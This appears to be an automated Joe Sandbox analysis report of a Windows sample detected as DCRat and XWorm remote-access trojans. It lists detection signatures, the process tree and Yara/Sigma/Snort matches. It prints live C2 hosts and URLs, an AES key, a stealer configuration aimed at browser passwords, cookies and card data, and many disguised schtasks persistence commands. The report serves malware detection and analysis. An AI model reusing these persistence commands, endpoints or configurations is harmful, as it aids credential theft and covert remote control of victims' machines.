Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ywXeiXEvP2.exe

Overview

General Information

Sample name:ywXeiXEvP2.exe
renamed because original name is a hash value
Original sample name:a8a4603bc85e306e0fdd17655e4820e4.exe
Analysis ID:1455415
MD5:a8a4603bc85e306e0fdd17655e4820e4
SHA1:5aa5d092a699c319c4d000f61eb526445b11662d
SHA256:4b7b7e697954f5882dd6d3e8ee6197bab6c445dbd3a5af1118caa0e1ad908a9a
Tags:DCRatexe
Infos:

Detection

DCRat, XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Snort IDS alert for network traffic
Yara detected DCRat
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Disable UAC(promptonsecuredesktop)
Disables UAC (registry)
Machine Learning detection for dropped file
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Sigma detected: WScript or CScript Dropper
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • ywXeiXEvP2.exe (PID: 6852 cmdline: "C:\Users\user\Desktop\ywXeiXEvP2.exe" MD5: A8A4603BC85E306E0FDD17655E4820E4)
    • Result.exe (PID: 4900 cmdline: "C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe" MD5: 57D593692C8428B66ED146E1FAC689B7)
      • DCRatBuild.exe (PID: 7140 cmdline: "C:\Users\user\AppData\Local\Temp\DCRatBuild.exe" MD5: 95D7FC6FAA389C5751DE5C2F88D9580B)
        • wscript.exe (PID: 7248 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\UGsUclNNu9UBh.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
          • cmd.exe (PID: 7436 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\hUqNkgIMv7nY24UYezK0etl.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • ServerWeb.exe (PID: 7488 cmdline: "C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe" MD5: 7EC6BC11E4B2E409845E3160EC47F5D7)
              • schtasks.exe (PID: 7960 cmdline: schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 7976 cmdline: schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwH" /sc ONLOGON /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 7992 cmdline: schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 8016 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 8032 cmdline: schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 8048 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 8064 cmdline: schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 6 /tr "'C:\Recovery\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 8080 cmdline: schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwH" /sc ONLOGON /tr "'C:\Recovery\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 8096 cmdline: schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 8 /tr "'C:\Recovery\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 8120 cmdline: schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Multimedia Platform\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 8136 cmdline: schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwH" /sc ONLOGON /tr "'C:\Program Files\Windows Multimedia Platform\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 8152 cmdline: schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Multimedia Platform\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 8168 cmdline: schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 7 /tr "'C:\Users\user\SendTo\sihost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 8184 cmdline: schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Users\user\SendTo\sihost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 2756 cmdline: schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 8 /tr "'C:\Users\user\SendTo\sihost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 5768 cmdline: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\jdownloader\config\conhost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 6824 cmdline: schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files (x86)\jdownloader\config\conhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 7228 cmdline: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\jdownloader\config\conhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 7172 cmdline: schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 6 /tr "'C:\Recovery\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 7244 cmdline: schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwH" /sc ONLOGON /tr "'C:\Recovery\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 6804 cmdline: schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 14 /tr "'C:\Recovery\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 5888 cmdline: schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 7 /tr "'C:\Users\All Users\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 7096 cmdline: schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwH" /sc ONLOGON /tr "'C:\Users\All Users\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 7288 cmdline: schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 14 /tr "'C:\Users\All Users\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 2056 cmdline: schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 10 /tr "'C:\Windows\IdentityCRL\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
              • schtasks.exe (PID: 5780 cmdline: schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwH" /sc ONLOGON /tr "'C:\Windows\IdentityCRL\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • wscript.exe (PID: 7268 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\file.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
      • XClient.exe (PID: 7204 cmdline: "C:\Users\user\AppData\Local\Temp\XClient.exe" MD5: 1BE2B217087429A8397F448C9C7B8F8D)
  • conhost.exe (PID: 7280 cmdline: "C:\Program Files (x86)\jdownloader\config\conhost.exe" MD5: 7EC6BC11E4B2E409845E3160EC47F5D7)
  • conhost.exe (PID: 2008 cmdline: "C:\Program Files (x86)\jdownloader\config\conhost.exe" MD5: 7EC6BC11E4B2E409845E3160EC47F5D7)
  • cleanup
{"C2 url": ["127.0.0.1", "letter-takes.gl.at.ply.gg"], "Port": "50230", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
{"SCRT": "{\"9\":\">\",\"A\":\"_\",\"a\":\"#\",\"4\":\"&\",\"j\":\"`\",\"i\":\")\",\"0\":\"(\",\"o\":\"~\",\"D\":\"!\",\"k\":\"$\",\"y\":\"|\",\"h\":\"@\",\"Q\":\"-\",\"H\":\"%\",\"S\":\" \",\"d\":\"<\",\"M\":\"*\",\"3\":\",\",\"J\":\";\",\"L\":\".\",\"m\":\"^\"}", "PCRT": "{\"O\":\"^\",\"U\":\"*\",\"v\":\"(\",\"V\":\")\",\"5\":\"!\",\"M\":\",\",\"Q\":\"$\",\"h\":\"-\",\"0\":\"_\",\"T\":\"~\",\"W\":\"@\",\"j\":\".\",\"1\":\"#\",\"L\":\"%\",\"K\":\"|\",\"t\":\";\",\"y\":\">\",\"a\":\"<\",\"o\":\" \",\"B\":\"&\",\"u\":\"`\"}", "TAG": "", "MUTEX": "DCR_MUTEX-s86YqWdFI22lJKKIYeYT", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 2, "ASCFG": {"savebrowsersdatatosinglefile": true, "ignorepartiallyemptydata": true, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": true, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, "searchpath": "%UsersFolder% - Fast"}, "AS": true, "ASO": false, "AD": false, "H1": "http://a0991799.xsph.ru/@=AjM2MDZ4kjN", "H2": "http://a0991799.xsph.ru/@=AjM2MDZ4kjN", "T": "0"}
SourceRuleDescriptionAuthorStrings
Result.exeJoeSecurity_XWormYara detected XWormJoe Security
    Result.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0x3c9a4b:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x3d224b:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x3c9ae8:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x3d22e8:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x3c9bfd:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x3d23fd:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x3c98bd:$cnc4: POST / HTTP/1.1
    • 0x3d20bd:$cnc4: POST / HTTP/1.1
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Temp\XClient.exeJoeSecurity_XWormYara detected XWormJoe Security
      C:\Users\user\AppData\Local\Temp\XClient.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x71d3:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x7270:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x7385:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x7045:$cnc4: POST / HTTP/1.1
      C:\Users\user\AppData\Roaming\XClient.exeJoeSecurity_XWormYara detected XWormJoe Security
        C:\Users\user\AppData\Roaming\XClient.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
        • 0x71d3:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
        • 0x7270:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
        • 0x7385:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
        • 0x7045:$cnc4: POST / HTTP/1.1
        C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exeJoeSecurity_XWormYara detected XWormJoe Security
          Click to see the 1 entries
          SourceRuleDescriptionAuthorStrings
          00000001.00000003.1702782236.0000000000B09000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
            00000001.00000003.1702782236.0000000000B09000.00000004.00000020.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0x63eb:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0xec03:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x6488:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0xeca0:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x659d:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0xedb5:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0x625d:$cnc4: POST / HTTP/1.1
            • 0xea75:$cnc4: POST / HTTP/1.1
            00000029.00000002.1997852879.00000000028C1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
              00000003.00000000.1702689242.0000000000482000.00000002.00000001.01000000.0000000B.sdmpJoeSecurity_XWormYara detected XWormJoe Security
                00000003.00000000.1702689242.0000000000482000.00000002.00000001.01000000.0000000B.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                • 0x6fd3:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                • 0x7070:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                • 0x7185:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                • 0x6e45:$cnc4: POST / HTTP/1.1
                Click to see the 19 entries
                SourceRuleDescriptionAuthorStrings
                1.3.Result.exe.b10a30.1.unpackJoeSecurity_XWormYara detected XWormJoe Security
                  1.3.Result.exe.b10a30.1.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                  • 0x53d3:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                  • 0x5470:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                  • 0x5585:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                  • 0x5245:$cnc4: POST / HTTP/1.1
                  1.0.Result.exe.7c9678.2.unpackJoeSecurity_XWormYara detected XWormJoe Security
                    1.0.Result.exe.7c9678.2.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                    • 0x53d3:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                    • 0x5470:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                    • 0x5585:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                    • 0x5245:$cnc4: POST / HTTP/1.1
                    3.0.XClient.exe.480000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                      Click to see the 13 entries

                      System Summary

                      barindex
                      Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe, ProcessId: 7488, TargetFilename: C:\Program Files (x86)\microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Program Files (x86)\jdownloader\config\conhost.exe", CommandLine: "C:\Program Files (x86)\jdownloader\config\conhost.exe", CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\jDownloader\config\conhost.exe, NewProcessName: C:\Program Files (x86)\jDownloader\config\conhost.exe, OriginalFileName: C:\Program Files (x86)\jDownloader\config\conhost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: "C:\Program Files (x86)\jdownloader\config\conhost.exe", ProcessId: 7280, ProcessName: conhost.exe
                      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\UGsUclNNu9UBh.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\UGsUclNNu9UBh.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\DCRatBuild.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe, ParentProcessId: 7140, ParentProcessName: DCRatBuild.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\UGsUclNNu9UBh.vbe" , ProcessId: 7248, ProcessName: wscript.exe
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe, ProcessId: 7488, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\FMxFFfLOKpqCLtTFEmbkPKJrDwH
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe, ProcessId: 7488, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                      Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\XClient.exe, ProcessId: 7204, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /f, CommandLine: schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe" , ParentImage: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe, ParentProcessId: 7488, ParentProcessName: ServerWeb.exe, ProcessCommandLine: schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /f, ProcessId: 7960, ProcessName: schtasks.exe
                      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\UGsUclNNu9UBh.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\UGsUclNNu9UBh.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\DCRatBuild.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe, ParentProcessId: 7140, ParentProcessName: DCRatBuild.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\UGsUclNNu9UBh.vbe" , ProcessId: 7248, ProcessName: wscript.exe

                      Persistence and Installation Behavior

                      barindex
                      Source: Process startedAuthor: Joe Security: Data: Command: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe'" /f, CommandLine: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe" , ParentImage: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe, ParentProcessId: 7488, ParentProcessName: ServerWeb.exe, ProcessCommandLine: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe'" /f, ProcessId: 8016, ProcessName: schtasks.exe
                      Timestamp:06/11/24-20:10:07.181847
                      SID:2853193
                      Source Port:53194
                      Destination Port:50230
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:06/11/24-20:08:24.216639
                      SID:2855924
                      Source Port:53174
                      Destination Port:50230
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: http://a0991799.xsph.ru/@=AjM2MDZ4kjNAvira URL Cloud: Label: malware
                      Source: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
